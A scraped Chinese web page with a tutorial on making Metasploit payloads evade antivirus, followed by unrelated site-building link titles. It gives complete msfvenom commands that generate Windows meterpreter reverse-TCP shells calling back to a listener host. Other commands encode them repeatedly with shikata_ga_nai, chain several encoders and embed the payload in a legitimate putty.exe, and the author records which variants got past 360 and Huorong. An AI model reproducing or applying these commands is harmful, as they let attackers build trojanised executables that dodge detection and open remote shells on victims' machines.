当前位置: 首页 > news >正文

服装网站建设的宗旨有哪些网站 服务器 域名

服装网站建设的宗旨有哪些,网站 服务器 域名,淘客返利怎么做网站,南宁网站seo推广公司0x01 免杀能力一览表 上面表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。由于本机测试时只是安装了360全家桶和火绒#xff0c;所以默认情…0x01 免杀能力一览表 上面表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2019.12.12)火绒版本5.0.33.13(2019.12.12)360安全卫士12.0.0.2001(2019.12.17)。其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀的精确判断指标。 0x02 前言 本节主要是对msf自身提供的免杀机制编码捆绑进行尝试由于msf被各大安全厂商盯的比较紧所以这些常规的方法免杀效果肯定是比较差的但有时把一两种常规方法稍微结合一下就能达到比较好的免杀效果 0x03 未处理的payload 在做免杀之前我们先生成一个原始payload作为原始参数对比这里我们就选使用频率最高的windows/meterperter/reverse_tcp这也是被各大杀软盯的最紧的一个。 msfvenom -p windows/meterpreter/reverse_tcp LHOST10.211.55.2 LPORT3333 -f exe -o payload1.exe基本不用怀疑本地的360全家桶和火绒都能查杀。 0x04 msf自编码处理 使用msfvenom --list encoders可查看所有编码器 评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器了。 使用x86/shikata_ga_nai生成payload参数-i为编码次数我这里设置15次并使用了-b参数去掉payload中的空字符。 msfvenom -p windows/meterpreter/reverse_tcp LHOST10.211.55.2 LPORT3333 -e x86/shikata_ga_nai -b \x00 -i 15 -f exe -o payload2.exe测试机器运行本地的360全家桶和火绒都能查杀。 由于shikata_ga_nai编码技术是多态的也就是说每次生成的payload文件都不一样有时生成的文件会被查杀有时却不会。当然这个也和编码次数有一定关系编码次数好像超过70次就经常生成出错但是编码次数多并不代表免杀能力强。 0x05 msf自捆绑免杀 在生成payload时可以使用捆绑功能使用msfvenom的-x参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中-x后面跟对应文件路径就可以。 我这里使用一个正规的putty.exe作为被捆绑测试软件。 生成payload命令如下 msfvenom -p windows/meterpreter/reverse_tcp LHOST10.211.55.2 LPORT3333 -x putty.exe -f exe -o payload3.exe生成的两个文件对比大小完全一样。 测试机器运行本地的360全家桶和火绒都能查杀该payload。 0x06 msf自捆绑编码 将上面的编码和捆绑两种方法结合一下进行尝试 msfvenom -p windows/meterpreter/reverse_tcp LHOST10.211.55.2 LPORT3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe测试机器执行发现火绒动态静态均能查杀而360不会报病毒。 在关闭火绒后开启360安全卫士和杀毒的情况下可上线可免杀。 可修改-i编码次数编码次数越多生成的payload越可能免杀经测试编码5次和6次可免杀360。 0x07 msfvenom 多重编码 msfvenom的encoder编码器可以对payload进行一定程度免杀同时还可以使用msfvenom多重编码功能通过管道让msfvenom用不同编码器反复编码进行混淆。 如下命令使用管道让msfvenom对攻击载荷多重编码先用shikata_ga_nai编码20次接着来10次的alpha_upper编码再来10次的countdown编码最后才生成以putty.exe为模板的可执行文件。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST10.211.55.2 LPORT3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe还有这种更多重编码姿势 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST192.168.74.133 LPORT5110 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe payload6.exevirustotal.com上查杀率为45/70编码多了免杀率居然降低了。。。尴尬。。 经过测试发现使用的编码类型越多免杀率可能会降低猜测是因为各种编码引入了更多的特征码。同时生成的payload也很可能无法正常执行这个也和被捆绑程序有一定关联 0x08 参考资料 使用msf编码器避开杀毒软件的检测https://www.freebuf.com/column/216599.html msf多重编码:https://blog.csdn.net/wyf12138/article/details/79825833 Msfvenom学习总结:http://www.secist.com/archives/3353.html msfvenom生成后门的免杀测试http://www.naivete.online/msfvenom%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E7%9A%84%E5%85%8D%E6%9D%80%E6%B5%8B%E8%AF%95/
http://www.zqtcl.cn/news/559899/

相关文章:

  • 个人网站的制作广州网站优化招聘
  • 做网站产生的流量费怎么算软件开发前景和收入
  • 网站空间 .de单页型网站
  • 网站建设com品牌建设的作用
  • 优质作文网站柳州做网站去哪家公司好
  • 呼和浩特网站建设价格网站建设服务器
  • 做的比较好的电商网站西安有那些做网站的公司好
  • 哪个网站可以做英语语法题智慧云建筑信息平台
  • 网站怎么做百度才会收录金乡县网站开发
  • 深圳移动网站建站网站如何做播放线路
  • 深圳网站建设q.479185700惠哪个网站可以免费设计房子
  • 迁西网站开发网站建设技术网站建
  • 网站建设与管理课程报告能够做外贸的网站有哪些
  • 浅析社区网站的建设如何建立企业网站
  • 网站建设尺寸像素是多少广州商城型网站建设
  • 重庆自助建站模板简述网络营销的特点
  • 企业网站托管一个月多少钱网页设计规范2018
  • 网站建设费用摊销会计分录合肥网站建设哪里好
  • 郑州市建设工程造价信息网站关于工程项目建设的网站
  • 网站做淘宝客收入咋样景区门户网站建设方案
  • 遵义做网站推广西安都有哪些公司
  • 万网建网站流程产品展示网站模板php
  • 新津县建设局网站网站做301
  • 网站域名续费如何建设一个简易网站
  • 网站整体迁移该怎么做wordpress 图片调用api接口
  • 网站获得流量最好的方法是什么 ( )汕头建设学校的网站
  • 网上下载的网站后台安全吗仿系统之家网站源码
  • 网站实名审核高等教材电工学久久建筑网
  • 化学试剂购买网站网站节点加速
  • 桂林城乡建设局网站在线咨询免费